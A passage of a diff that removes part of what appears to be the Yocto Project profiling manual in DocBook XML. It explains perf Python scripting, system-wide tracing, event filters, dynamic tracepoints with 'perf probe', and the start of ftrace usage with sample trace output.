- Full-blown detailed tracing data does however offer the opportunity
- to manipulate and present the information collected during a
- tracing run in an infinite variety of ways.
- </para>
-
- <para>
- Another way to look at it is that there are only so many ways that
- the 'primitive' counters can be used on their own to generate
- interesting output; to get anything more complicated than simple
- counts requires some amount of additional logic, which is typically
- very specific to the problem at hand. For example, if we wanted to
- make use of a 'counter' that maps to the value of the time
- difference between when a process was scheduled to run on a
- processor and the time it actually ran, we wouldn't expect such
- a counter to exist on its own, but we could derive one called say
- 'wakeup_latency' and use it to extract a useful view of that metric
- from trace data. Likewise, we really can't figure out from standard
- profiling tools how much data every process on the system reads and
- writes, along with how many of those reads and writes fail
- completely. If we have sufficient trace data, however, we could
- with the right tools easily extract and present that information,
- but we'd need something other than pre-canned profiling tools to
- do that.
- </para>
-
- <para>
- Luckily, there is a general-purpose way to handle such needs,
- called 'programming languages'. Making programming languages
- easily available to apply to such problems given the specific
- format of data is called a 'programming language binding' for
- that data and language. Perf supports two programming language
- bindings, one for Python and one for Perl.
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> Language bindings for manipulating and
- aggregating trace data are of course not a new
- idea. One of the first projects to do this was IBM's DProbes
- dpcc compiler, an ANSI C compiler which targeted a low-level
- assembly language running on an in-kernel interpreter on the
- target system. This is exactly analogous to what Sun's DTrace
- did, except that DTrace invented its own language for the purpose.
- Systemtap, heavily inspired by DTrace, also created its own
- one-off language, but rather than running the product on an
- in-kernel interpreter, created an elaborate compiler-based
- machinery to translate its language into kernel modules written
- in C.
- </informalexample>
-
- <para>
- Now that we have the trace data in perf.data, we can use
- 'perf script -g' to generate a skeleton script with handlers
- for the read/write entry/exit events we recorded:
- <literallayout class='monospaced'>
- root@crownbay:~# perf script -g python
- generated Python script: perf-script.py
- </literallayout>
- The skeleton script simply creates a python function for each
- event type in the perf.data file. The body of each function simply
- prints the event name along with its parameters. For example:
- <literallayout class='monospaced'>
- def net__netif_rx(event_name, context, common_cpu,
- common_secs, common_nsecs, common_pid, common_comm,
- skbaddr, len, name):
- print_header(event_name, common_cpu, common_secs, common_nsecs,
- common_pid, common_comm)
-
- print "skbaddr=%u, len=%u, name=%s\n" % (skbaddr, len, name),
- </literallayout>
- We can run that script directly to print all of the events
- contained in the perf.data file:
- <literallayout class='monospaced'>
- root@crownbay:~# perf script -s perf-script.py
-
- in trace_begin
- syscalls__sys_exit_read 0 11624.857082795 1262 perf nr=3, ret=0
- sched__sched_wakeup 0 11624.857193498 1262 perf comm=migration/0, pid=6, prio=0, success=1, target_cpu=0
- irq__softirq_raise 1 11624.858021635 1262 wget vec=TIMER
- irq__softirq_entry 1 11624.858074075 1262 wget vec=TIMER
- irq__softirq_exit 1 11624.858081389 1262 wget vec=TIMER
- syscalls__sys_enter_read 1 11624.858166434 1262 wget nr=3, fd=3, buf=3213019456, count=512
- syscalls__sys_exit_read 1 11624.858177924 1262 wget nr=3, ret=512
- skb__kfree_skb 1 11624.858878188 1262 wget skbaddr=3945041280, location=3243922184, protocol=0
- skb__kfree_skb 1 11624.858945608 1262 wget skbaddr=3945037824, location=3243922184, protocol=0
- irq__softirq_raise 1 11624.859020942 1262 wget vec=TIMER
- irq__softirq_entry 1 11624.859076935 1262 wget vec=TIMER
- irq__softirq_exit 1 11624.859083469 1262 wget vec=TIMER
- syscalls__sys_enter_read 1 11624.859167565 1262 wget nr=3, fd=3, buf=3077701632, count=1024
- syscalls__sys_exit_read 1 11624.859192533 1262 wget nr=3, ret=471
- syscalls__sys_enter_read 1 11624.859228072 1262 wget nr=3, fd=3, buf=3077701632, count=1024
- syscalls__sys_exit_read 1 11624.859233707 1262 wget nr=3, ret=0
- syscalls__sys_enter_read 1 11624.859573008 1262 wget nr=3, fd=3, buf=3213018496, count=512
- syscalls__sys_exit_read 1 11624.859584818 1262 wget nr=3, ret=512
- syscalls__sys_enter_read 1 11624.859864562 1262 wget nr=3, fd=3, buf=3077701632, count=1024
- syscalls__sys_exit_read 1 11624.859888770 1262 wget nr=3, ret=1024
- syscalls__sys_enter_read 1 11624.859935140 1262 wget nr=3, fd=3, buf=3077701632, count=1024
- syscalls__sys_exit_read 1 11624.859944032 1262 wget nr=3, ret=1024
- </literallayout>
- That in itself isn't very useful; after all, we can accomplish
- pretty much the same thing by simply running 'perf script'
- without arguments in the same directory as the perf.data file.
- </para>
-
- <para>
- We can however replace the print statements in the generated
- function bodies with whatever we want, and thereby make it
- infinitely more useful.
- </para>
-
- <para>
- As a simple example, let's just replace the print statements in
- the function bodies with a simple function that does nothing but
- increment a per-event count. When the program is run against a
- perf.data file, each time a particular event is encountered,
- a tally is incremented for that event. For example:
- <literallayout class='monospaced'>
- def net__netif_rx(event_name, context, common_cpu,
- common_secs, common_nsecs, common_pid, common_comm,
- skbaddr, len, name):
- inc_counts(event_name)
- </literallayout>
- Each event handler function in the generated code is modified
- to do this. For convenience, we define a common function called
- inc_counts() that each handler calls; inc_counts() simply tallies
- a count for each event using the 'counts' hash, which is a
- specialized hash function that does Perl-like autovivification, a
- capability that's extremely useful for kinds of multi-level
- aggregation commonly used in processing traces (see perf's
- documentation on the Python language binding for details):
- <literallayout class='monospaced'>
- counts = autodict()
-
- def inc_counts(event_name):
- try:
- counts[event_name] += 1
- except TypeError:
- counts[event_name] = 1
- </literallayout>
- Finally, at the end of the trace processing run, we want to
- print the result of all the per-event tallies. For that, we
- use the special 'trace_end()' function:
- <literallayout class='monospaced'>
- def trace_end():
- for event_name, count in counts.iteritems():
- print "%-40s %10s\n" % (event_name, count)
- </literallayout>
- The end result is a summary of all the events recorded in the
- trace:
- <literallayout class='monospaced'>
- skb__skb_copy_datagram_iovec 13148
- irq__softirq_entry 4796
- irq__irq_handler_exit 3805
- irq__softirq_exit 4795
- syscalls__sys_enter_write 8990
- net__net_dev_xmit 652
- skb__kfree_skb 4047
- sched__sched_wakeup 1155
- irq__irq_handler_entry 3804
- irq__softirq_raise 4799
- net__net_dev_queue 652
- syscalls__sys_enter_read 17599
- net__netif_receive_skb 1743
- syscalls__sys_exit_read 17598
- net__netif_rx 2
- napi__napi_poll 1877
- syscalls__sys_exit_write 8990
- </literallayout>
- Note that this is pretty much exactly the same information we get
- from 'perf stat', which goes a little way to support the idea
- mentioned previously that given the right kind of trace data,
- higher-level profiling-type summaries can be derived from it.
- </para>
-
- <para>
- Documentation on using the
- <ulink url='http://linux.die.net/man/1/perf-script-python'>'perf script' python binding</ulink>.
- </para>
- </section>
-
- <section id='system-wide-tracing-and-profiling'>
- <title>System-Wide Tracing and Profiling</title>
-
- <para>
- The examples so far have focused on tracing a particular program or
- workload - in other words, every profiling run has specified the
- program to profile in the command-line e.g. 'perf record wget ...'.
- </para>
-
- <para>
- It's also possible, and more interesting in many cases, to run a
- system-wide profile or trace while running the workload in a
- separate shell.
- </para>
-
- <para>
- To do system-wide profiling or tracing, you typically use
- the -a flag to 'perf record'.
- </para>
-
- <para>
- To demonstrate this, open up one window and start the profile
- using the -a flag (press Ctrl-C to stop tracing):
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g -a
- ^C[ perf record: Woken up 6 times to write data ]
- [ perf record: Captured and wrote 1.400 MB perf.data (~61172 samples) ]
- </literallayout>
- In another window, run the wget test:
- <literallayout class='monospaced'>
- root@crownbay:~# wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |*******************************| 41727k 0:00:00 ETA
- </literallayout>
- Here we see entries not only for our wget load, but for other
- processes running on the system as well:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-systemwide.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- In the snapshot above, we can see callchains that originate in
- libc, and a callchain from Xorg that demonstrates that we're
- using a proprietary X driver in userspace (notice the presence
- of 'PVR' and some other unresolvable symbols in the expanded
- Xorg callchain).
- </para>
-
- <para>
- Note also that we have both kernel and userspace entries in the
- above snapshot. We can also tell perf to focus on userspace but
- providing a modifier, in this case 'u', to the 'cycles' hardware
- counter when we record a profile:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g -a -e cycles:u
- ^C[ perf record: Woken up 2 times to write data ]
- [ perf record: Captured and wrote 0.376 MB perf.data (~16443 samples) ]
- </literallayout>
- </para>
-
- <para>
- <imagedata fileref="figures/perf-report-cycles-u.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- Notice in the screenshot above, we see only userspace entries ([.])
- </para>
-
- <para>
- Finally, we can press 'enter' on a leaf node and select the 'Zoom
- into DSO' menu item to show only entries associated with a
- specific DSO. In the screenshot below, we've zoomed into the
- 'libc' DSO which shows all the entries associated with the
- libc-xxx.so DSO.
- </para>
-
- <para>
- <imagedata fileref="figures/perf-systemwide-libc.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- We can also use the system-wide -a switch to do system-wide
- tracing. Here we'll trace a couple of scheduler events:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -a -e sched:sched_switch -e sched:sched_wakeup
- ^C[ perf record: Woken up 38 times to write data ]
- [ perf record: Captured and wrote 9.780 MB perf.data (~427299 samples) ]
- </literallayout>
- We can look at the raw output using 'perf script' with no
- arguments:
- <literallayout class='monospaced'>
- root@crownbay:~# perf script
-
- perf 1383 [001] 6171.460045: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1383 [001] 6171.460066: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
- kworker/1:1 21 [001] 6171.460093: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
- swapper 0 [000] 6171.468063: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
- swapper 0 [000] 6171.468107: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
- kworker/0:3 1209 [000] 6171.468143: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
- perf 1383 [001] 6171.470039: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1383 [001] 6171.470058: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
- kworker/1:1 21 [001] 6171.470082: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
- perf 1383 [001] 6171.480035: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- </literallayout>
- </para>
-
- <section id='perf-filtering'>
- <title>Filtering</title>
-
- <para>
- Notice that there are a lot of events that don't really have
- anything to do with what we're interested in, namely events
- that schedule 'perf' itself in and out or that wake perf up.
- We can get rid of those by using the '--filter' option -
- for each event we specify using -e, we can add a --filter
- after that to filter out trace events that contain fields
- with specific values:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -a -e sched:sched_switch --filter 'next_comm != perf &amp;&amp; prev_comm != perf' -e sched:sched_wakeup --filter 'comm != perf'
- ^C[ perf record: Woken up 38 times to write data ]
- [ perf record: Captured and wrote 9.688 MB perf.data (~423279 samples) ]
-
-
- root@crownbay:~# perf script
-
- swapper 0 [000] 7932.162180: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
- kworker/0:3 1209 [000] 7932.162236: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
- perf 1407 [001] 7932.170048: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1407 [001] 7932.180044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1407 [001] 7932.190038: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1407 [001] 7932.200044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1407 [001] 7932.210044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- perf 1407 [001] 7932.220044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- swapper 0 [001] 7932.230111: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
- swapper 0 [001] 7932.230146: sched_switch: prev_comm=swapper/1 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
- kworker/1:1 21 [001] 7932.230205: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=swapper/1 next_pid=0 next_prio=120
- swapper 0 [000] 7932.326109: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
- swapper 0 [000] 7932.326171: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
- kworker/0:3 1209 [000] 7932.326214: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
- </literallayout>
- In this case, we've filtered out all events that have 'perf'
- in their 'comm' or 'comm_prev' or 'comm_next' fields. Notice
- that there are still events recorded for perf, but notice
- that those events don't have values of 'perf' for the filtered
- fields. To completely filter out anything from perf will
- require a bit more work, but for the purpose of demonstrating
- how to use filters, it's close enough.
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> These are exactly the same set of event
- filters defined by the trace event subsystem. See the
- ftrace/tracecmd/kernelshark section for more discussion about
- these event filters.
- </informalexample>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> These event filters are implemented by a
- special-purpose pseudo-interpreter in the kernel and are an
- integral and indispensable part of the perf design as it
- relates to tracing. kernel-based event filters provide a
- mechanism to precisely throttle the event stream that appears
- in user space, where it makes sense to provide bindings to real
- programming languages for postprocessing the event stream.
- This architecture allows for the intelligent and flexible
- partitioning of processing between the kernel and user space.
- Contrast this with other tools such as SystemTap, which does
- all of its processing in the kernel and as such requires a
- special project-defined language in order to accommodate that
- design, or LTTng, where everything is sent to userspace and
- as such requires a super-efficient kernel-to-userspace
- transport mechanism in order to function properly. While
- perf certainly can benefit from for instance advances in
- the design of the transport, it doesn't fundamentally depend
- on them. Basically, if you find that your perf tracing
- application is causing buffer I/O overruns, it probably
- means that you aren't taking enough advantage of the
- kernel filtering engine.
- </informalexample>
- </section>
- </section>
-
- <section id='using-dynamic-tracepoints'>
- <title>Using Dynamic Tracepoints</title>
-
- <para>
- perf isn't restricted to the fixed set of static tracepoints
- listed by 'perf list'. Users can also add their own 'dynamic'
- tracepoints anywhere in the kernel. For instance, suppose we
- want to define our own tracepoint on do_fork(). We can do that
- using the 'perf probe' perf subcommand:
- <literallayout class='monospaced'>
- root@crownbay:~# perf probe do_fork
- Added new event:
- probe:do_fork (on do_fork)
-
- You can now use it in all perf tools, such as:
-
- perf record -e probe:do_fork -aR sleep 1
- </literallayout>
- Adding a new tracepoint via 'perf probe' results in an event
- with all the expected files and format in
- /sys/kernel/debug/tracing/events, just the same as for static
- tracepoints (as discussed in more detail in the trace events
- subsystem section:
- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# ls -al
- drwxr-xr-x 2 root root 0 Oct 28 11:42 .
- drwxr-xr-x 3 root root 0 Oct 28 11:42 ..
- -rw-r--r-- 1 root root 0 Oct 28 11:42 enable
- -rw-r--r-- 1 root root 0 Oct 28 11:42 filter
- -r--r--r-- 1 root root 0 Oct 28 11:42 format
- -r--r--r-- 1 root root 0 Oct 28 11:42 id
-
- root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# cat format
- name: do_fork
- ID: 944
- format:
- field:unsigned short common_type; offset:0; size:2; signed:0;
- field:unsigned char common_flags; offset:2; size:1; signed:0;
- field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
- field:int common_pid; offset:4; size:4; signed:1;
- field:int common_padding; offset:8; size:4; signed:1;
-
- field:unsigned long __probe_ip; offset:12; size:4; signed:0;
-
- print fmt: "(%lx)", REC->__probe_ip
- </literallayout>
- We can list all dynamic tracepoints currently in existence:
- <literallayout class='monospaced'>
- root@crownbay:~# perf probe -l
- probe:do_fork (on do_fork)
- probe:schedule (on schedule)
- </literallayout>
- Let's record system-wide ('sleep 30' is a trick for recording
- system-wide but basically do nothing and then wake up after
- 30 seconds):
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g -a -e probe:do_fork sleep 30
- [ perf record: Woken up 1 times to write data ]
- [ perf record: Captured and wrote 0.087 MB perf.data (~3812 samples) ]
- </literallayout>
- Using 'perf script' we can see each do_fork event that fired:
- <literallayout class='monospaced'>
- root@crownbay:~# perf script
-
- # ========
- # captured on: Sun Oct 28 11:55:18 2012
- # hostname : crownbay
- # os release : 3.4.11-yocto-standard
- # perf version : 3.4.11
- # arch : i686
- # nrcpus online : 2
- # nrcpus avail : 2
- # cpudesc : Intel(R) Atom(TM) CPU E660 @ 1.30GHz
- # cpuid : GenuineIntel,6,38,1
- # total memory : 1017184 kB
- # cmdline : /usr/bin/perf record -g -a -e probe:do_fork sleep 30
- # event : name = probe:do_fork, type = 2, config = 0x3b0, config1 = 0x0, config2 = 0x0, excl_usr = 0, excl_kern
- = 0, id = { 5, 6 }
- # HEADER_CPU_TOPOLOGY info available, use -I to display
- # ========
- #
- matchbox-deskto 1197 [001] 34211.378318: do_fork: (c1028460)
- matchbox-deskto 1295 [001] 34211.380388: do_fork: (c1028460)
- pcmanfm 1296 [000] 34211.632350: do_fork: (c1028460)
- pcmanfm 1296 [000] 34211.639917: do_fork: (c1028460)
- matchbox-deskto 1197 [001] 34217.541603: do_fork: (c1028460)
- matchbox-deskto 1299 [001] 34217.543584: do_fork: (c1028460)
- gthumb 1300 [001] 34217.697451: do_fork: (c1028460)
- gthumb 1300 [001] 34219.085734: do_fork: (c1028460)
- gthumb 1300 [000] 34219.121351: do_fork: (c1028460)
- gthumb 1300 [001] 34219.264551: do_fork: (c1028460)
- pcmanfm 1296 [000] 34219.590380: do_fork: (c1028460)
- matchbox-deskto 1197 [001] 34224.955965: do_fork: (c1028460)
- matchbox-deskto 1306 [001] 34224.957972: do_fork: (c1028460)
- matchbox-termin 1307 [000] 34225.038214: do_fork: (c1028460)
- matchbox-termin 1307 [001] 34225.044218: do_fork: (c1028460)
- matchbox-termin 1307 [000] 34225.046442: do_fork: (c1028460)
- matchbox-deskto 1197 [001] 34237.112138: do_fork: (c1028460)
- matchbox-deskto 1311 [001] 34237.114106: do_fork: (c1028460)
- gaku 1312 [000] 34237.202388: do_fork: (c1028460)
- </literallayout>
- And using 'perf report' on the same file, we can see the
- callgraphs from starting a few programs during those 30 seconds:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-probe-do_fork-profile.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> The trace events subsystem accommodate static
- and dynamic tracepoints in exactly the same way - there's no
- difference as far as the infrastructure is concerned. See the
- ftrace section for more details on the trace event subsystem.
- </informalexample>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> Dynamic tracepoints are implemented under the
- covers by kprobes and uprobes. kprobes and uprobes are also used
- by and in fact are the main focus of SystemTap.
- </informalexample>
- </section>
- </section>
-
- <section id='perf-documentation'>
- <title>Documentation</title>
-
- <para>
- Online versions of the man pages for the commands discussed in this
- section can be found here:
- <itemizedlist>
- <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-stat'>'perf stat' manpage</ulink>.
- </para></listitem>
- <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-record'>'perf record' manpage</ulink>.
- </para></listitem>
- <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-report'>'perf report' manpage</ulink>.
- </para></listitem>
- <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-probe'>'perf probe' manpage</ulink>.
- </para></listitem>
- <listitem><para>The <ulink url='http://linux.die.net/man/1/perf-script'>'perf script' manpage</ulink>.
- </para></listitem>
- <listitem><para>Documentation on using the
- <ulink url='http://linux.die.net/man/1/perf-script-python'>'perf script' python binding</ulink>.
- </para></listitem>
- <listitem><para>The top-level
- <ulink url='http://linux.die.net/man/1/perf'>perf(1) manpage</ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Normally, you should be able to invoke the man pages via perf
- itself e.g. 'perf help' or 'perf help record'.
- </para>
-
- <para>
- However, by default Yocto doesn't install man pages, but perf
- invokes the man pages for most help functionality. This is a bug
- and is being addressed by a Yocto bug:
- <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=3388'>Bug 3388 - perf: enable man pages for basic 'help' functionality</ulink>.
- </para>
-
- <para>
- The man pages in text form, along with some other files, such as
- a set of examples, can be found in the 'perf' directory of the
- kernel tree:
- <literallayout class='monospaced'>
- tools/perf/Documentation
- </literallayout>
- There's also a nice perf tutorial on the perf wiki that goes
- into more detail than we do here in certain areas:
- <ulink url='https://perf.wiki.kernel.org/index.php/Tutorial'>Perf Tutorial</ulink>
- </para>
- </section>
-</section>
-
-<section id='profile-manual-ftrace'>
- <title>ftrace</title>
-
- <para>
- 'ftrace' literally refers to the 'ftrace function tracer' but in
- reality this encompasses a number of related tracers along with
- the infrastructure that they all make use of.
- </para>
-
- <section id='ftrace-setup'>
- <title>Setup</title>
-
- <para>
- For this section, we'll assume you've already performed the basic
- setup outlined in the General Setup section.
- </para>
-
- <para>
- ftrace, trace-cmd, and kernelshark run on the target system,
- and are ready to go out-of-the-box - no additional setup is
- necessary. For the rest of this section we assume you've ssh'ed
- to the host and will be running ftrace on the target. kernelshark
- is a GUI application and if you use the '-X' option to ssh you
- can have the kernelshark GUI run on the target but display
- remotely on the host if you want.
- </para>
- </section>
-
- <section id='basic-ftrace-usage'>
- <title>Basic ftrace usage</title>
-
- <para>
- 'ftrace' essentially refers to everything included in
- the /tracing directory of the mounted debugfs filesystem
- (Yocto follows the standard convention and mounts it
- at /sys/kernel/debug). Here's a listing of all the files
- found in /sys/kernel/debug/tracing on a Yocto system:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# ls
- README kprobe_events trace
- available_events kprobe_profile trace_clock
- available_filter_functions options trace_marker
- available_tracers per_cpu trace_options
- buffer_size_kb printk_formats trace_pipe
- buffer_total_size_kb saved_cmdlines tracing_cpumask
- current_tracer set_event tracing_enabled
- dyn_ftrace_total_info set_ftrace_filter tracing_on
- enabled_functions set_ftrace_notrace tracing_thresh
- events set_ftrace_pid
- free_buffer set_graph_function
- </literallayout>
- The files listed above are used for various purposes -
- some relate directly to the tracers themselves, others are
- used to set tracing options, and yet others actually contain
- the tracing output when a tracer is in effect. Some of the
- functions can be guessed from their names, others need
- explanation; in any case, we'll cover some of the files we
- see here below but for an explanation of the others, please
- see the ftrace documentation.
- </para>
-
- <para>
- We'll start by looking at some of the available built-in
- tracers.
- </para>
-
- <para>
- cat'ing the 'available_tracers' file lists the set of
- available tracers:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# cat available_tracers
- blk function_graph function nop
- </literallayout>
- The 'current_tracer' file contains the tracer currently in
- effect:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
- nop
- </literallayout>
- The above listing of current_tracer shows that
- the 'nop' tracer is in effect, which is just another
- way of saying that there's actually no tracer
- currently in effect.
- </para>
-
- <para>
- echo'ing one of the available_tracers into current_tracer
- makes the specified tracer the current tracer:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# echo function > current_tracer
- root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
- function
- </literallayout>
- The above sets the current tracer to be the
- 'function tracer'. This tracer traces every function
- call in the kernel and makes it available as the
- contents of the 'trace' file. Reading the 'trace' file
- lists the currently buffered function calls that have been
- traced by the function tracer:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
-
- # tracer: function
- #
- # entries-in-buffer/entries-written: 310629/766471 #P:8
- #
- # _-----=&gt; irqs-off
- # / _----=&gt; need-resched
- # | / _---=&gt; hardirq/softirq
- # || / _--=&gt; preempt-depth
- # ||| / delay
- # TASK-PID CPU# |||| TIMESTAMP FUNCTION
- # | | | |||| | |
- &lt;idle&gt;-0 [004] d..1 470.867169: ktime_get_real &lt;-intel_idle
- &lt;idle&gt;-0 [004] d..1 470.867170: getnstimeofday &lt;-ktime_get_real
- &lt;idle&gt;-0 [004] d..1 470.867171: ns_to_timeval &lt;-intel_idle
- &lt;idle&gt;-0 [004] d..1 470.867171: ns_to_timespec &lt;-ns_to_timeval
- &lt;idle&gt;-0 [004] d..1 470.867172: smp_apic_timer_interrupt &lt;-apic_timer_interrupt
- &lt;idle&gt;-0 [004] d..1 470.867172: native_apic_mem_write &lt;-smp_apic_timer_interrupt
- &lt;idle&gt;-0 [004] d..1 470.867172: irq_enter &lt;-smp_apic_timer_interrupt
- &lt;idle&gt;-0 [004] d..1 470.867172: rcu_irq_enter &lt;-irq_enter
- &lt;idle&gt;-0 [004] d..1 470.867173: rcu_idle_exit_common.isra.33 &lt;-rcu_irq_enter
- &lt;idle&gt;-0 [004] d..1 470.867173: local_bh_disable &lt;-irq_enter
- &lt;idle&gt;-0 [004] d..1 470.867173: add_preempt_count &lt;-local_bh_disable
- &lt;idle&gt;-0 [004] d.s1 470.867174: tick_check_idle &lt;-irq_enter
- &lt;idle&gt;-0 [004] d.s1 470.867174: tick_check_oneshot_broadcast &lt;-tick_check_idle
- &lt;idle&gt;-0 [004] d.s1 470.867174: ktime_get &lt;-tick_check_idle
- &lt;idle&gt;-0 [004] d.s1 470.867174: tick_nohz_stop_idle &lt;-tick_check_idle
- &lt;idle&gt;-0 [004] d.s1 470.867175: update_ts_time_stats &lt;-tick_nohz_stop_idle
- &lt;idle&gt;-0 [004] d.s1 470.867175: nr_iowait_cpu &lt;-update_ts_time_stats
- &lt;idle&gt;-0 [004] d.s1 470.867175: tick_do_update_jiffies64 &lt;-tick_check_idle
- &lt;idle&gt;-0 [004] d.s1 470.867175: _raw_spin_lock &lt;-tick_do_update_jiffies64
- &lt;idle&gt;-0 [004] d.s1 470.867176: add_preempt_count &lt;-_raw_spin_lock
- &lt;idle&gt;-0 [004] d.s2 470.867176: do_timer &lt;-tick_do_update_jiffies64
- &lt;idle&gt;-0 [004] d.s2 470.867176: _raw_spin_lock &lt;-do_timer
- &lt;idle&gt;-0 [004] d.s2 470.867176: add_preempt_count &lt;-_raw_spin_lock
- &lt;idle&gt;-0 [004] d.s3 470.867177: ntp_tick_length &lt;-do_timer
- &lt;idle&gt;-0 [004] d.s3 470.867177: _raw_spin_lock_irqsave &lt;-ntp_tick_length
- .
- .
- .
- </literallayout>
- Each line in the trace above shows what was happening in
- the kernel on a given cpu, to the level of detail of
- function calls. Each entry shows the function called,
- followed by its caller (after the arrow).
- </para>
-
- <para>
- The function tracer gives you an extremely detailed idea
- of what the kernel was doing at the point in time the trace
- was taken, and is a great way to learn about how the kernel
- code works in a dynamic sense.
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> The ftrace function tracer is also
- available from within perf, as the ftrace:function tracepoint.
- </informalexample>
-
- <para>
- It is a little more difficult to follow the call chains than
- it needs to be - luckily there's a variant of the function
- tracer that displays the callchains explicitly, called the
- 'function_graph' tracer:
- <literallayout class='monospaced'>
- root@sugarbay:/sys/kernel/debug/tracing# echo function_graph &gt; current_tracer
- root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
-
- tracer: function_graph
-
- CPU DURATION FUNCTION CALLS
- | | | | | | |
- 7) 0.046 us | pick_next_task_fair();
- 7) 0.043 us | pick_next_task_stop();
- 7) 0.042 us | pick_next_task_rt();
- 7) 0.032 us | pick_next_task_fair();
- 7) 0.030 us | pick_next_task_idle();
- 7) | _raw_spin_unlock_irq() {
- 7) 0.033 us | sub_preempt_count();
- 7) 0.258 us | }
- 7) 0.032 us | sub_preempt_count();
- 7) + 13.341 us | } /* __schedule */
- 7) 0.095 us | } /* sub_preempt_count */
- 7) | schedule() {
- 7) | __schedule() {
- 7) 0.060 us | add_preempt_count();
- 7) 0.044 us | rcu_note_context_switch();
- 7) | _raw_spin_lock_irq() {
- 7) 0.033 us | add_preempt_count();
- 7) 0.247 us | }
- 7) | idle_balance() {
- 7) | _raw_spin_unlock() {
- 7) 0.031 us | sub_preempt_count();
- 7) 0.246 us | }
- 7) | update_shares() {
- 7) 0.030 us | __rcu_read_lock();
- 7) 0.029 us | __rcu_read_unlock();
- 7) 0.484 us | }
- 7) 0.030 us | __rcu_read_lock();
- 7) | load_balance() {
- 7) | find_busiest_group() {
- 7) 0.031 us | idle_cpu();
- 7) 0.029 us | idle_cpu();
- 7) 0.035 us | idle_cpu();
- 7) 0.906 us | }
- 7) 1.141 us | }
- 7) 0.022 us | msecs_to_jiffies();
- 7) | load_balance() {
- 7) | find_busiest_group() {
- 7) 0.031 us | idle_cpu();
- .
- .
- .
- 4) 0.062 us | msecs_to_jiffies();
- 4) 0.062 us | __rcu_read_unlock();
- 4) | _raw_spin_lock() {
- 4) 0.073 us | add_preempt_count();
